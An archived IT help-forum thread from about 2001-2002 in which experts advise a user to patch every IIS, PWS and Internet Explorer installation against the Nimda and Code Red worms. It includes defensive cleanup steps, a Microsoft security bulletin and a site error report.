We help IT Professionals succeed at work.

Need to Patch a development server?

kellykln
kellykln asked
on
We are being hit again and again with Viruses. The latest being the new Nimda. I have 3 servers on my network; 2-NT and 1 W2K Server. Only one of my NT machines is open to the outside and is also a mail server. I have made sure to apply all the patches and service packs to the IIS etc. on that one machine that is open to the internet. Do I have to patch my others servers for which I use the IIS only for developement and on my local intranet? I also have workstations running PWS for development. Do these have to be patched? Do I have to upgrade from IE 5 to IE5.5 on on my workstations or is it just enough on my server that is running IIS as a real web server?
Comment
Watch Question

CERTIFIED EXPERT
Top Expert 2007

Commented:
I would patch everything, since experience has shown that nimda gets into ANY server running IIS and some other services.

The listing of services that stop under code RED :
               WWW publishing service
               MS SMTP service
               FTP Publishing service
               Site Server Authentification service
               Site Server LDAP Service
------------------

I would err on the side of caution here !

I hope this helps !

Author

Commented:
I'd like to hear more about this subject. Where can I get more info for this specific question
CERTIFIED EXPERT
Top Expert 2007
Commented:
            Site Server LDAP Service

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-033.asp
               Do you have Explorer.exe in your root directory
               ex c:\explorer.exe ????
               if so you have version 2 of code red.
               you will need an extraction tool, a simple reboot and patch will not fix it.

               here is a link to the info

               http://www.antivirus.com/vinfo/security/readme_codec.txt

               here is a link to the tool

               http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=CODERED.C
Patches are available for both the IIS vulnerability and Web browsers at
     (http://www.microsoft.com/security).

Nimda Virus
From: Silvers5    Date: 09/24/2001 10:31PM
               Please follow strictly these steps to remove and shield systems on the network they've proven effective:

               1- Check the system, if it is windows 2000 check if IIS5 is installed (you can go to services and see
               if there's a IISADMIN service, If so then apply the patch provided for IIS5, if the system asks for
               the service pack 1 then get it from IIS
               If the system is an NT server or an NT workstation, check if option pack is installed and further IIS4,
               proceed by patching IIS4 using IIS4.exe patch.
               Check if IIS is not needed on any of the systems then DISABLE it from the services panel
               2- Then check Internet Explorer, if it's IE 5.0 , 5.01 then apply the patch for IE5.01 , if Explorer
               is 5.5 apply the patch IE5.5 in some cases if the system is already patched it will pop up that it doesn't
               need an update.
               3- Only now install Mcafee anti virus with latest dat and dat fix and perform a full scan for ALL files
               on fixed disks, set it to clean automatically.
               4- If no virus infection is found then the system now is secure only for the time being that it is protected
               by the Vshield, you NEED to set the vshield to scan ALL files, I noticed in all cases that Vshield will
               reset to scan application files only after the station is restarted, it is immenent to tell users to
               re configure the settings to scan all.
               5- If Alas an infection is detected then let Mcafee finish the scans, go to the users and groups in
               computer management (if win 2k or where applicable in NT), select the guest account, it should be in
               the administrators group ang guests group.. remove it from both, rename the guest account and disable
               it. check the winnt share and remove change or full permissions for everyone (set it to read).. if IIS
               must be disabled then disable the IUSR_machinename account too.
               delete all the TFTP* from the inetpub/scripts dir (or below) since these are the worm copies, McAfee
               will only clean them..
               reboot the server, better unplug the power cable, since the worm will be resident in the memory and
               it seems that it detects shutdown attempts in some cases and can delay and the shutdown process to copy
               itself to the HDD, alter registry or system.ini  and restart on next reloading.
               The infected machine should be disconnected from the LAN (quarantined)  it is recommended to return
               to that machine each 30 minutes and rescan it if more infections are noticed re-unplug the system after
               the scan and recheck after 30 minutes until there are no more infections (don't forget to check and     set the vshield to scan all files on each reboot)

  this fix will remove the virus completely too
               http://newdata.box.sk/hx/nimdascn.zip
--
In my office environment, I found myself in the role of emergency
virus security chief when our vice president of sales detected the
Nimda virus on his notebook computer during a routine daily antivirus
scan. Fortunately, the infection was restricted to a group of files
in
his Temporary Internet Files folder, and the virus had not executed.

When Nimda infects a Web server, the virus serves a file (readme.eml)
that versions of Internet Explorer (IE) prior to 5.5 Service Pack 2
(SP2) will automatically download and execute. To make sure this type
of virus can't propagate, you need to update local systems to a more
secure version of IE and patch Outlook to prevent the virus from
using
Outlook as a Messaging API (MAPI) server to send email.

Here's a list of basic rules that I put together for our
organization's users to follow:
   1. Upgrade to IE 5.5 SP2 or IE 6 ( http://www.microsoft.com/ie ).
   2. Patch your version of Outlook to the current service pack and
apply security fixes.
   3. Turn on file extensions.
      a. Never open an attachment with two extensions (e.g.,
readme.doc.pif).
      b. Never open any executable attachments.
      c. If you don't recognize the extension, ask for help.

I provided detailed instructions for performing these tasks and made
sure that local copies of all necessary files were available on the
network. The most annoying part of updating these client machines was
that even though we have a standard vendor for desktop systems, not
every user's machine ran the same version of Office 2000 (e.g., some
had the Small Business version, and some had the Premium version),
and
because the computers came with the software preinstalled, we didn't
have any network shares with all the setup files. When applying the
fixes to Outlook, we had to find the Office installation disk
specific
to each Office 2000 installation.

Applying the security fixes to Outlook also caused a minor annoyance
that I'm still explaining to users. The security patch doesn't let
other applications use the Outlook MAPI server without permission
from
the local user. Many users in my company use a contact manager that
synchronizes by sending an email message. I was flooded with calls
from users worried about the new pop-up message they received when
they tried to perform their daily synchronization. Although users
grumbled a bit about the extra two mouse clicks now required to
synchronize, everyone understood the need after I explained why it
worked this way.

------------------------
Asta CuTechnical consultant & graphic design
CERTIFIED EXPERT
Top Expert 2004

Commented:
Please update the experts here who have so willingly stepped in to help you, since much time has passed since your last comments, and Email notifications may not have been generated to the participating experts here due to some problems at that time.  If you've been helped, accept the respective comment by that expert to grade and close it.

To see all your Open and Locked questions, click your member profile and View Question history to update/close them as well.

Somewhat off-topic, but important.

****************************** ALERT********************************
WindowsUpdate - Critical Update alert March 28, 2002 from Microsoft
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-015.asp
Synopsis:
Microsoft Security Bulletin MS02-015  
28 March 2002 Cumulative Patch for Internet Explorer
Originally posted: March 28, 2002
Summary
Who should read this bulletin: Customers using Microsoft® Internet Explorer
Impact of vulnerability: Two vulnerabilities, the most serious of which would allow script to run in the Local Computer Zone.
Maximum Severity Rating: Critical
Recommendation: Consumers using the affected version of IE should install the patch immediately.
Affected Software:
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0

Thought you'd appreciate knowing this.
":0)
Asta

Author

Commented:
I tried to give sysexpert points but I get an error the following error when I do:
type Exception report

message Internal Server Error

description The server encountered an internal error (Internal Server Error) that prevented it from fulfilling this request.

exception

org.apache.jasper.JasperException: Unable to compile class for JSPNote: sun.tools.javac.Main has been deprecated.


An error occurred between lines: 1 and 40 in the jsp file: /jsp/../shared/emailCommentAdded.jsp

Generated servlet error:
/home/ee/tomcat/work/localhost/_/jsp/qAcceptComment$jsp.java:1010: Undefined variable or class name: ta
                     emailBody2 = ta.getPathFromCache() + "Q_" + qId + ".html\n\n";
                                  ^


An error occurred between lines: 1 and 41 in the jsp file: /jsp/../shared/emailAcceptAnswer.jsp

Generated servlet error:
/home/ee/tomcat/work/localhost/_/jsp/qAcceptComment$jsp.java:1090: Undefined variable or class name: ta
                     emailBody2 =  ta.getPathFromCache() + "Q_" + qId + ".html\n\n";
                                   ^


An error occurred between lines: 1 and 54 in the jsp file: /jsp/../shared/emailAcceptAnswerOwner.jsp

Generated servlet error:
/home/ee/tomcat/work/localhost/_/jsp/qAcceptComment$jsp.java:1153: Undefined variable or class name: ta
                     emailBody2 = ta.getPathFromCache() + "Q_" + qId + ".html\n\n";
                                  ^
Note: /home/ee/tomcat/work/localhost/_/jsp/qAcceptComment$jsp.java uses or overrides a deprecated API.  Recompile with "-deprecation" for details.
3 errors, 2 warnings

      at org.apache.jasper.compiler.Compiler.compile(Compiler.java:285)
      at org.apache.jasper.servlet.JspServlet.loadJSP(JspServlet.java:552)
      at org.apache.jasper.servlet.JspServlet$JspServletWrapper.loadIfNecessary(JspServlet.java:177)
      at org.apache.jasper.servlet.JspServlet$JspServletWrapper.service(JspServlet.java:189)
      at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:382)
      at org.apache.jasper.servlet.JspServlet.service(JspServlet.java:474)
      at com.ee.servlet.RedirectJspServlet.service(RedirectJspServlet.java:80)
      at javax.servlet.http.HttpServlet.service(HttpServlet.java:853)
      at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:247)
      at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:193)
      at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:243)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:566)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:472)
      at org.apache.catalina.core.ContainerBase.invoke(ContainerBase.java:943)
      at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:190)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:566)
      at org.apache.catalina.valves.CertificatesValve.invoke(CertificatesValve.java:246)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:564)
      at com.ee.servlet.HandleJspServlet.invoke(HandleJspServlet.java:101)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:564)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:472)
      at org.apache.catalina.core.ContainerBase.invoke(ContainerBase.java:943)
      at org.apache.catalina.core.StandardContext.invoke(StandardContext.java:2343)
      at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:180)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:566)
      at org.apache.catalina.valves.ErrorDispatcherValve.invoke(ErrorDispatcherValve.java:170)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:564)
      at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:170)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:564)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:472)
      at org.apache.catalina.core.ContainerBase.invoke(ContainerBase.java:943)
      at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:174)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:566)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:472)
      at org.apache.catalina.core.ContainerBase.invoke(ContainerBase.java:943)
      at org.apache.ajp.tomcat4.Ajp13Processor.process(Ajp13Processor.java:458)
      at org.apache.ajp.tomcat4.Ajp13Processor.run(Ajp13Processor.java:551)
      at java.lang.Thread.run(Thread.java:536)



--------------------------------------------------------------------------------
Asta CuTechnical consultant & graphic design
CERTIFIED EXPERT
Top Expert 2004

Commented:
Engineering is working to  fix this problem.  Perhaps SysExpert can Propose an Answer here for you to then accept and grade to close; this has been a workaround to this roadblock.
":0) Asta

Author

Commented:
Thanks, sorry for the delay in points. I tried before but it wouldn't go through
Asta CuTechnical consultant & graphic design
CERTIFIED EXPERT
Top Expert 2004

Commented:
Thank you for returning and finalizing this.  Sorry you had access problems; things should be improving given the work our Engineering team has been doing.  If you continue to encounter problems, post a zero point question in the Community Support topic area to get help.

":0) Asta

Explore More ContentExplore courses, solutions, and other research materials related to this topic.